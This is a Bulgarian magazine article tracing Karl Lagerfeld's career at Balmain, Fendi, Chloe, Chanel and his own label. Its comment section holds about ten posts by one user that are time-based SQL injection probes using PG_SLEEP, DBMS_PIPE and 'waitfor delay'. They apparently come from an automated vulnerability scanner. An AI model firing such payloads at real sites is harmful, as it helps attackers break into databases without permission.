Карл Лагерфелд – дизайнерът, който промени света на модата

10 септември 2020 | 19:33
2307
120
Getty Images
120

Трудно е да се оцени влиянието на Карл Лагерфелд върху света на модата.

Аз съм подвижен етикет. Казвам се не Лагерфелд, а Лейбълфелд“, често така се шегуваше дизайнерът и признаваше, че обича да бъде като „карикатура на себе си“, а венецианският бал за този маскиран мъж продължаваше целогодишно.

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by Chanel Fans (@ladyinchanel) on


Той е роден в Хамбург, започва сам да подбира дрехите си на 4-годишна възраст, а на 14 се мести в Париж, за да се посвети на създаването на дрехи. Въпреки че първите му колекции са приети хладно от критиците (дебютната колекция за Жан Пату се счита за „твърде провокативна“), той продължава да работи с луди темпове до последния ден от живота си. Лагерфелд определя модата като едно от хобитата си, на което посвещава по-голямата част от живота си. Други хобита включват илюстрации, четене, фотография и превръщане на ежедневието в красив ритуал.

На 10 септември той можеше да навърши 87 години, но през февруари миналата година си отиде. Днес искаме да ви припомним някои от най-значимите събития от живота на Карл Лагерфелд, повлияли на света на модата.


Balmain
През 1954 г. Пиер Балмен обявява конкурс за най-добър дизайн на палто. Печели го не друг, а Карл Лагерфелд, който по това време е само на 16 (или на 21 – тайната за рождената му дата все още не е разгадана). Младият дизайнер работи в модна къща Balmain повече от три години, но напуска, за да прекара известно време в „проучване на живота“.


 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by NOTAS NARANJA "Short Articles" (@notasnaranja) on

Fendi

През 1965 г., когато името на модна къща Fendi се свързва изключително с богати домакини, облечени в кожуси, Лагерфелд се превръща в глътка свеж въздух за бранда. Именно той създава известната емблема - свързаните букви FF, които се превръщат в символ на марката, както и кожените палта, имитиращи леопард.
Fendi е моята римска версия. Правя тук това, което не си позволявам в Париж.
Карл е първият гост дизайнер в историята на Fendi и остава начело на марката цели 50 години.
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by Fashion Advisory (@boutique.de.luxe) on

Chloe

Габи Аньон, основателката на модна къща Chloe, наема младия дизайнер през 1965 г. и Карл работи за марката до 1992 г. В този период част от неговата личност - любовта към историческите цитати, спонтанността, жизнеността – се превръщат в символи на бранда.
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by Ryan (@ryanatdecades) on

Chanel

През 80-те години Chanel не е от най-популярните марки и е основно предпочитана от по-консервтивни дами. Кайзерът не се страхува да рискува репутацията си и оглавява модната къща през 1982 година. Той преосмисля всички класически модели, добавя нови кройки, необичайни детайли, дързост, сексуалност и най-важното - стила на Лагерфелд. Модна къща Chanel се превръща в идеалната творческа платформа, а самата марка се възражда от пепелта.
Коко би ме намразила. Тя създаде определено лице и аз сега имам право да го подобря.... Трябва да изляза от рамката какво бе Chanel и да покажа каква трябва или би могла да бъде “, казва Лагерфелд, когато поема модната къща 12 години след смъртта на Габриел.
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by CHANEL LOVER (@chanellover) on


Karl Lagerfeld

Модата е нещо, което не можеш да контролираш“, казва Лагерфелд. “Идва време за промяна, независимо дали ви харесва или не. Ако не го направите, някой друг ще го направи вместо вас - това е философията на Karl Lagerfeld”.
Той основава едноименната марка през 1984 г. Неговата идентичност присъства в чист вид в първите мъжки колекции, след което преминава и към линията от дамски дрехи.

 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by KARL LAGERFELD (@karllagerfeld) on



Умението да провокира

През 1993 г. Анна Уинтур, въпреки присъщата й сдържаност, бързо напуска залата преди шоуто на Fendi (под артистичното ръководство на Лагерфелд) да приключи. Факт е, че вместо професионални модели на модния подиум има професионални стриптизьорки, а сред тях - и италианската порно звезда Моана Поци. Смелият ход на Лагерфелд е в подкрепа на борбата за сексуалната революция от 90-те години и появата на светло на работещите в секс-индустрията. Иронична стъпка, но въпреки това принос в борбата за правата на човека. След това ревю хората от улицата, дефилиращи на модния подиум на Balenciaga вече не изглеждат като сензация - Лагерфелд прави това още през 90-те.
 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

A post shared by Harper's Bazaar en Espaol (@harpersbazaarmx) on


 

Коментари

120 MmzHrrdb
  15 септември 2020 | 10:10 отговор
 

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12.212)||'

 
119 MmzHrrdb
  15 септември 2020 | 10:10 отговор
 

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12.212)

 
118 MmzHrrdb
  15 септември 2020 | 10:10 отговор
 

9oHOM60H')) OR 461=(SELECT 461 FROM PG_SLEEP(12.212))--

 
117 MmzHrrdb
  15 септември 2020 | 10:09 отговор
 

01HRmh63') OR 484=(SELECT 484 FROM PG_SLEEP(12.212))--

 
116 MmzHrrdb
  15 септември 2020 | 10:09 отговор
 

AGmF7dOD' OR 326=(SELECT 326 FROM PG_SLEEP(12.212))--

 
115 MmzHrrdb
  15 септември 2020 | 10:09 отговор
 

-1)) OR 888=(SELECT 888 FROM PG_SLEEP(12.212))--

 
114 MmzHrrdb
  15 септември 2020 | 10:09 отговор
 

-5) OR 251=(SELECT 251 FROM PG_SLEEP(12.212))--

 
113 MmzHrrdb
  15 септември 2020 | 10:09 отговор
 

-5 OR 444=(SELECT 444 FROM PG_SLEEP(12.212))--

 
112 MmzHrrdb
  15 септември 2020 | 10:08 отговор
 

Q0YSgBOx'; waitfor delay '0:0:12.212' --

 
111 MmzHrrdb
  15 септември 2020 | 10:08 отговор
 

1 waitfor delay '0:0:12.212' --

 

Добави Коментар

Най-четени

Вашите лични данни

Ние събираме и обработваме Вашите лични данни.

За осигуряване на правата ви по GDPR, молим за Вашето съгласие.

Ще използваме данните за осигуряване на по-доброто Ви преживяване на нашите сайтове.

Ако натиснете бутона Приемам всички, ще дадете съгласието си на нас и на всички трети страни, описани детайлно в Политиката за поверителност и Политиката за бисквитките.

Защо е необходимо моето съгласие?

НАСТРОЙКИ ЗА ПОВЕРИТЕЛНОСТ

  • Нормално функциониране на сайтовете
    Не е зададено

    Тези данни са стриктно необходими за нормалната работа на сайтовете и мобилните ни апликации. Чрез тях можем да удостоверим самоличността Ви като логнат потребители, да Ви покажем по-добре съдържанието, да заредим сайта по-бързо, да защитаваме сайтовете и Вас от посегателства.

    Такива данни например са данните от сесията Ви – информация дали сте логнат, кеширано съдържание и други.

    Тук попадат и данните, свързани с идентифицирането Ви във връзка с регистрация за използване на наша услуга.

  • За изпълнение на нашите услуги
    Не е зададено

    Някои от услугите ни, като електронната търговия, изискват да споделите с нас лични данни. Използваме ги за да можем да изпълним договора си с Вас, за продажба и доставка на предлаганите от нас стоки.

    Други предлагани от нас услуги са възможностите да добавяте новина, коментари, снимки или видеа. Използваме личните Ви данни, която ни дава възможност да Ви идентифицираме и при необходимост – да модерираме добавеното от Вас съдържание.

  • За измерване
    Не е зададено

    Събираме информация за Вашето използване на съдържанието и я комбинираме с предишно събрана, за да измерим, разберем и отчетем Вашето използване на услугите ни.

    Тази цел не включва персонализиране и профилиране.

  • За подбор, доставка и отчитане на реклами
    Не е зададено

    Събираме информация и я комбинираме с предишно налична, за да подберем и Ви доставим релевантна реклама и за да можем да измерим доставката и ефективността й. Това може да включва предварително събрана информация за Вашите предишни интереси към подбрани реклами, обработка на данни за поведението Ви, когато рекламата Ви е била показана, колко често Ви се показват дадени реклами, къде и кога са Ви били показани, дали сте предприели действие свързано с рекламата, включително клик на рекламата и направена покупка.

    Тази цел не включва персонализиране и профилиране.

  • За подбор, доставка и отчитане на съдържание
    Не е зададено

    Събираме информация и я комбинираме с предишно събрана, за да подберем и Ви доставим релевантно съдържание и да измерим доставката и ефективността му. Това може да включва предварително събрана информация за Вашите интереси към съдържанието, обработка на данни за показаното Ви съдържание, колко често или за колко време е било показано, дали сте предприели действие, свързано със съдържанието, включително клик на съдържанието.

    Тази цел не включва персонализиране и профилиране.

  • За персонализация и профилиране
    Не е зададено

    Събираме и обработваме информация за използването на услугите ни за последващо сервиране на персонализирана реклама и/или съдържание в друг контекст, напр. други сайтове и мобилни апликации, след време.

    Типично, съдържанието и поведението Ви на сайта/мобилната апликации се използва за създаване на заключения за Вашите интереси, чрез които се управлява бъдещият избор на сервирани реклами и/или съдържание.

  • По възложение и за проекти на трети страни
    Не е зададено

    При конкретни проекти по възложение на трети страни събираме Ваши лични данни, които им споделяме за осъществяване целите на проектите им. Детайлна информация за целите може да намерите в Общите условия на всеки конкретен проект, който ще Ви бъдат предоставени за получаване на Вашето съгласие.

    Понякога използваме личните ви данни, за да Ви информираме за игри и промоционални оферти на Спортал и/или на трети страни – Партньори на Спортал.

    За изпълнение на тази цел, събираме Ваши лични данни, за да Ви информираме за наши или на трети страни, наши партньори, инициативи, промоции, игри, оферти и други.

    За всички описани по-горе цели можем да използваме инструменти на трети страни.

  • За Директен маркетинг
    Не е зададено

    За да Ви изпращаме винаги актуална и полезна информация за нашите инициативи, събираме данни като адрес на електронна поща или друг начин за контакт с Вас – Viber, Skype, Messenger профил или такъв в друга комуникационна платформа.